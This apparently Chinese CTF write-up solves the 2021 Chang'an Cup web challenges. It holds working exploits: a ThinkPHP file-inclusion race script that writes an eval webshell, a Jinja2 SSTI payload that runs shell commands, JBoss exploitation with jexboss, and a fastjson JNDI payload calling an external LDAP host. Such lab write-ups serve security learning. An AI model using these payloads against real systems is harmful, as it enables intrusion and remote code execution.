长安杯ctf2021web

DaLaBengBa

扫描目录得备份文件
查看控制器index
IndexController.class.php

<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
    /**
     * Default action.
     *
     * Rejects the request when any element of $doge matches the
     * case-insensitive pattern flag|Home|Common\/21; otherwise hands the
     * whole array to assign() and renders the template.
     *
     * Note: preg_grep() inspects element VALUES only. Array KEYS (for
     * example `_filename`) are never checked, and the caller controls the
     * entire array, so this denylist does not constrain which template
     * variables end up being set. $doge defaults to '' although
     * preg_grep() expects an array.
     */
    public function index($doge=''){
        if(preg_grep('/flag|Home|Common\/21/i',$doge)){
            die("<dialog open>Get Out Hacker!</dialog>");
        }else{
            $this->assign($doge);
            $this->display();
        }
    }
}

根据参考文章的分析可知
传入的数组变量$doge最后赋值给Storage::load方法中的数组$vars变量
extract()函数会对其造成变量覆盖

    /**
     * Extract $vars into the local scope, then include $_filename.
     *
     * EXTR_OVERWRITE lets a key named `_filename` (or `vars`) inside $vars
     * replace the path passed by the caller before the include runs.
     * Extracting with EXTR_SKIP keeps the caller's $_filename authoritative.
     */
    public function load($_filename,$vars=null){
        if(!is_null($vars)){
            extract($vars, EXTR_OVERWRITE);
        }
        include $_filename; // perform the file inclusion
    }

当我们传入的 $doge 为 array(['_filename'=>'/etc/passwd']) 时
构造url可形成任意文件包含漏洞

http://498eeee3.yunyansec.com/index.php?g=index&m=home&a=index&doge[_filename]=/etc/passwd

最后利用条件竞争包含session临时文件getshell

#coding=utf-8
import io
import requests
import threading
sessid = 'TGAO'  # sent as the PHPSESSID cookie; read() targets /tmp/sess_<sessid> with it

# POST body used by read(); see that function.
data = {"cmd":'''file_put_contents('/var/www/html/1.php', 'shivers<?php eval($_POST["cmd"]);?>');'''}
def write(session) -> None:
    """Loop forever, uploading a 50 KiB file with PHP_SESSION_UPLOAD_PROGRESS set.

    While such an upload is in progress PHP records its progress (including
    the field's value) in the session file named by the PHPSESSID cookie;
    with session.upload_progress.cleanup on (the PHP default) that file is
    removed when the upload finishes, which is why read() has to race it.
    Turning session.upload_progress.enabled off removes the mechanism.

    The loop has no exit condition and ``resp`` is never read.
    """
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post( 'http://498eeee3.yunyansec.com/index.php', data={'PHP_SESSION_UPLOAD_PROGRESS': 'aaa<?php eval($_POST["cmd"]);?>'}, files={'file': ('tgao.txt',f)}, cookies={'PHPSESSID': sessid} )

def read(session) -> None:
    """Loop forever, requesting the index action with doge[_filename] set to
    the session file for ``sessid`` and posting ``data`` as the body.

    Seeing ``'tgao.txt'`` (the uploaded file name) in the response means the
    session file was included while it still existed. ``event`` is a module
    global created under the ``__main__`` guard; no loop waits on it, so
    ``event.clear()`` does not stop any thread.
    """
    while True:
        resp = session.post('http://498eeee3.yunyansec.com/index.php/?g=index&m=home&a=index&doge[_filename]=/tmp/sess_'+sessid,data=data)
        if'tgao.txt'in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("[+++++++++++++]retry")
            
if __name__=="__main__":
    # Module-global Event referenced by read(); nothing waits on it.
    event=threading.Event()
    with requests.session() as session:
        # 29 writer threads and 29 reader threads, all sharing one Session.
        for i in range(1,30): 
            threading.Thread(target=write,args=(session,)).start()
        for i in range(1,30):
            threading.Thread(target=read,args=(session,)).start()
    # Reached right after the threads are started (the with-block has already
    # exited); the non-daemon threads loop forever, so set() changes nothing.
    event.set()

连接1.php
密码cmd
POST提交cmd=print_r(file_get_contents('flag.php'));
flag在页面源代码中

参考https://www.cnblogs.com/zpchcbd/p/11949672.html

ezpy

利用c-jwt-cracker工具爆破jwt得密钥CTf4r
https://jwt.io/网站进行jwt伪造
可以发现在user处存在ssti模板注入

{
  "user": "admin{{7*7}}",
  "uid": "8606d40d-eac5-4b32-abcf-c6affeee56c1",
  "role": "admin",
  "passwd": "admin"
}

可以在网页的title中得到回显

把所有类下载到本地
{{[].__class__.__base__.__subclasses__()}}
写脚本找到catch_warnings类的序号为[243]

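# Find which chunk of the saved __subclasses__() dump mentions catch_warnings;
# the printed index is the one referenced in the template expression.
# The context manager closes the file even if read() raises, which the
# original open()/close() pair did not guarantee.
with open('test.txt', 'r') as f:
    data = f.read()
r = data.split("<TemplateReference None>")
for i, chunk in enumerate(r):
    if 'catch_warnings' in chunk:
        print(i, '~~~', chunk)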

经过绕过后进行构造

{{[].__class__.__base__.__subclasses__()[243].__init__.__globals__.__builtins__[request.args.cat1](request.args.cat2)}}

最后利用

{
  "user": "admin{{[].__class__.__base__.__subclasses__()[243].__init__.__globals__.__builtins__[request.args.cat1](request.args.cat2)}}",
  "uid": "8606d40d-eac5-4b32-abcf-c6affeee56c1",
  "role": "admin",
  "passwd": "admin"
}
#####
GET /flag?cat1=eval&cat2=__import__('os').popen('cat$IFS$9/flag').read() HTTP/1.1
Host: edf0588e.yunyansec.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: http://edf0588e.yunyansec.com/
Connection: close
Referer: http://edf0588e.yunyansec.com/
Cookie: Hm_lvt_f6095793646f2ba4a15ac9ee2cd1af7a=1632484716,1632484831; Hm_lpvt_f6095793646f2ba4a15ac9ee2cd1af7a=1632484831; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW57e1tdLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzI0M10uX19pbml0X18uX19nbG9iYWxzX18uX19idWlsdGluc19fW3JlcXVlc3QuYXJncy5jYXQxXShyZXF1ZXN0LmFyZ3MuY2F0Mil9fSIsInVpZCI6Ijg2MDZkNDBkLWVhYzUtNGIzMi1hYmNmLWM2YWZmZWVlNTZjMSIsInJvbGUiOiJhZG1pbiIsInBhc3N3ZCI6ImFkbWluIn0.eHyTMcgRaEFgD7U64BCWlrd0UoG8hmwDvA2MMvH2BcM
Upgrade-Insecure-Requests: 1

Old But A Little New

jboss漏洞
利用jexboss工具

# Setup
git clone https://github.com/joaomatosf/jexboss.git
pip install requires.txt

# Usage
python jexboss.py -u http://a15a0a60.yunyansec.com/ 

asuka

同上

soeasy

fastjson<=1.2.47-反序列化漏洞

# 工具:marshalsec,需要用mvn打包一下,建议直接使用打包好的。
# github:https://github.com/mbechler/marshalsec
# 链接(已打包好): https://pan.baidu.com/s/1kT9vwhNDDdiJ3dL9BS3U4w&shfl=shareset 提取码: sven

#####
POST / HTTP/1.1
Host: 8b70f48d.yunyansec.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_f6095793646f2ba4a15ac9ee2cd1af7a=1632484716,1632484831; Hm_lpvt_f6095793646f2ba4a15ac9ee2cd1af7a=1632484831
Upgrade-Insecure-Requests: 1
Content-Length: 253

{'name':{
      "@type": "java.lang.Class",
      "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "x": {
      "@type": "com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName": "ldap://xxx.xxx.xxx.xxx:35402/Exploit",
     "autoCommit": true
   }}

可参考https://cloud.tencent.com/developer/article/1553664
